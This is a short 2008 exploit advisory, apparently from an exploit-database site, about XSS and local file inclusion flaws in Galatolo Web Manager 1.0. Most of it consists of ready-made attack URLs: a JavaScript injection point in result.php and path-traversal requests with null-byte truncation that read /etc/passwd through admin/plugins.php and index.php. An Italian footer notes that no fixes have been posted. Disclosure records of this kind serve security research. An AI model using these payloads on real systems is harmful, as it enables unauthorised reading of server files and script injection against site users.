Galatolo Web Manager 1.0 XSS - Local File Inclusion Vulnerability
2008-06-08 00:00:00@~~===========================================~~@
| Author => StAkeR ~ [email protected] |
@~~===========================================~~@
+ +
@~~===========================================~~@
| Galatolo Web Manager 1.0 <= XSS and LFI |
@~~===========================================~~@
| result.php?key= [XSS, Insert your code js |
| admin/plugins.php?plugin=../..etc/passwd%00 |
| index.php?com=../../../../../etc/passwd%00 |
@~~===========================================~~@
+
@~~====================================~~@
| http://www.gwm.dev-area.org/GWM.zip |
@~~====================================~~@
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.

